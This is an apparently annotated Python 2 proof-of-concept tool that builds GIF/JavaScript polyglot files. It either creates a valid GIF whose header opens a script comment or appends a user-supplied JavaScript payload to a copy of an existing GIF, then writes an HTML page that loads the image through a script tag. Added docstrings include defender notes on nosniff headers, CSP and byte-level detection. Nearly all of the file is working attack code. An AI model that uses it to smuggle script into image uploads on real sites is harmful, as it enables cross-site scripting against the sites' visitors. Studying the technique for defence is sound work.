#!/usr/bin/env python2
#============================================================================================================#
#======= Simply injects a JavaScript Payload into a GIF. ====================================================#
#======= or it creates a JavaScript Payload as a GIF. ====================================================#
#======= The resulting GIF must be a valid (not corrupted) GIF. =============================================#
#======= Author: marcoramilli.blogspot.com ==================================================================#
#======= Version: PoC (don't even think to use it in development env.) ======================================#
#======= Disclaimer: ========================================================================================#
#THIS IS NOT PEP3 FORMATTED
#THIS SOFTWARE IS PROVIDED BY THE AUTHOR "AS IS" AND ANY EXPRESS OR
#IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
#WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
#DISCLAIMED. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY DIRECT,
#INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
#(INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
#SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
#HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
#STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING
#IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
#POSSIBILITY OF SUCH DAMAGE.
#===========================================================================================================#
import argparse
import binascii
import os
24 | ||
25 | ||
#---------------------------------------------------------
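def _hexify(num):
    """
    Convert a non-negative integer to its raw byte string, most significant byte first.

    The value is rendered as lowercase hex, left-padded with a single '0' when
    the digit count is odd, then decoded two digits per byte (0 -> one NUL byte).
    A negative value produces a '-' in the hex text, which the decoder rejects.
    """
    digits = "%x" % num
    if len(digits) % 2:
        # The decoder consumes digit pairs, so an odd count needs a leading zero.
        digits = '0' + digits
    # str.decode('hex') exists only on Python 2; unhexlify gives the same bytes
    # there and also works on Python 3.
    return binascii.unhexlify(digits)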
35 | ||
36 | ||
#---------------------------------------------------------
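def _generate_and_write_to_file(payload, fname):
    """
    Write a minimal file that parses both as a GIF89a image and as script text.

    The Logical Screen Width bytes are 0x2F 0x2A ("/*"), so a script parser
    reads the signature as the identifier GIF89a followed by an open block
    comment that hides the binary fields. After the image data, "*/" closes
    the comment and "=1;" completes an assignment; ``payload`` is then written
    unmodified, followed by one more 0x3B.

    payload -- byte string appended verbatim after the header
    fname   -- path of the file to create (truncated if it already exists)

    Returns True once all three parts have been written.

    Defender note: the script text only runs when a page loads the file via
    <script src>. Serving uploads with their real image Content-Type plus
    X-Content-Type-Options: nosniff makes browsers refuse it as script, and
    an upload check can flag a GIF whose bytes 6-7 are 2F 2A or that carries
    printable data after the image blocks.
    """
    header = (
        b'\x47\x49\x46\x38\x39\x61'  # signature + version: "GIF89a"
        b'\x2F\x2A'                  # Logical Screen Width; also "/*" to a script parser
        b'\x0A\x00'                  # Logical Screen Height (10, little-endian)
        b'\x00'                      # packed fields: no Global Color Table
        b'\xFF'                      # background color index
        b'\x00'                      # pixel aspect ratio
        # Image Descriptor (0x2C, offset 0/0, same width/height, no local
        # table), LZW minimum code size 2, zero-length data block, 0x3B.
        b'\x2C\x00\x00\x00\x00\x2F\x2A\x0A\x00\x00\x02\x00\x3B'
        b'\x2A\x2F'                  # "*/" closes the comment opened by the width bytes
        b'\x3D\x31\x3B'              # "=1;" makes the leading "GIF89a" an assignment
    )
    trailer = b'\x3B'
    # The context manager closes the handle even if one of the writes raises,
    # which the plain open()/close() pair did not guarantee.
    with open(fname, "wb") as f:
        f.write(header)
        f.write(payload)
        f.write(trailer)
    return True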
60 | ||
61 | ||
#---------------------------------------------------------
def _generate_launching_page(f):
    """
    Write "run.html" in the current directory as a local test harness.

    The page references f + "_malw.gif" twice: once through <img> and once
    through <script src>. The second reference is the one that asks the
    browser to treat the file as script; the first only renders it.

    f -- base file name; it is concatenated into the attributes without any
         HTML escaping, and the <img> tag is emitted with a stray backslash
         before its closing '>'.

    Returns True after the page is written.

    Defender note: a response header of X-Content-Type-Options: nosniff on the
    image, or a Content-Security-Policy that does not allow scripts from the
    location where uploads are stored, prevents the <script src> load.
    """
    target = f + "_malw.gif"
    page_lines = (
        "",
        "<html>",
        "<head><title>Opening an image</title> </head>",
        "<body>",
        "<img src=\"" + target + "\"\\>",
        "<script src= \"" + target + "\"> </script>",
        "</body>",
        "</html>",
        "",
    )
    htmlpage = "\n".join(page_lines)
    # Binary mode with a str argument relies on Python 2 string semantics.
    html = open("run.html", "wb")
    html.write(htmlpage)
    html.close()
    return True
80 | ||
81 | ||
#---------------------------------------------------------
def _inject_into_file(payload, fname):
    """
    Copy an existing GIF to fname + "_malw.gif" and append script text to the copy.

    Steps, in order:
      1. copy the source line by line, replacing every 2A 2F ("*/") and
         2F 2A ("/*") byte pair with two NUL bytes so the image data cannot
         open or close a script comment by accident;
      2. overwrite bytes 6-7 (the Logical Screen Width) with 2F 2A ("/*");
      3. append "*/=1;", then ``payload``, then a final 0x3B.

    Both the pair replacement and the width overwrite change the image bytes,
    so the copy is not byte-identical to the source picture.

    NOTE(review): the original note warned about the pairs FF 2A and 2A 5C,
    but the code only rewrites 2A 2F and 2F 2A -- confirm which was meant.
    NOTE(review): the source is opened in text mode ("rt") while the patterns
    are byte strings; this presumably depends on Python 2 str semantics.

    Returns True when the copy has been written.

    Defender note: the output is recognisable by 2F 2A at offset 6 and by
    printable script text after the end of the GIF data.
    """
    out_name = fname + "_malw.gif"
    with open(out_name, "w+b") as fout:
        with open(fname, "rt") as fin:
            for line in fin:
                # Neutralise "*/" first, then "/*", exactly as the two-step original did.
                cleaned = line.replace(b'\x2A\x2F', b'\x00\x00').replace(b'\x2F\x2A', b'\x00\x00')
                fout.write(cleaned)
        # Offset 6 is the first byte after the 6-byte "GIF8xa" signature.
        fout.seek(6, 0)
        fout.write(b'\x2F\x2A')  # "/*"

    f = open(out_name, "a+b")  # append mode: writes land after the copied image
    for piece in (b'\x2A\x2F\x3D\x31\x3B', payload, b'\x3B'):
        f.write(piece)
    f.close()
    return True
105 | ||
106 | ||
#---------------------------------------------------------
if __name__ == "__main__":
    # Command-line entry point: parse the two positional arguments and the
    # optional -i switch, print the banner, build the file, then write run.html.
    cli = argparse.ArgumentParser()
    cli.add_argument("filename", help="the gif file name to be generated/or infected")
    cli.add_argument("js_payload", help="the payload to be injected. For exmample: \"alert(\"test\");\"")
    cli.add_argument("-i", "--inject-to-existing-gif", action="store_true", help="inject into the current gif")
    args = cli.parse_args()
    print("""
|======================================================================================================|
| [!] legal disclaimer: usage of this tool for injecting malware to be propagated is illegal. |
| It is the end user's responsibility to obey all applicable local, state and federal laws. |
| Authors assume no liability and are not responsible for any misuse or damage caused by this program |
|======================================================================================================|
"""
    )
    # -i rewrites a copy of an existing GIF; otherwise a fresh file is created
    # at the given name.
    build = _inject_into_file if args.inject_to_existing_gif else _generate_and_write_to_file
    build(args.js_payload, args.filename)

    # NOTE(review): the page written here always references
    # <filename>_malw.gif, a name that only the -i branch produces.
    _generate_launching_page(args.filename)
    print("[+] Finished!")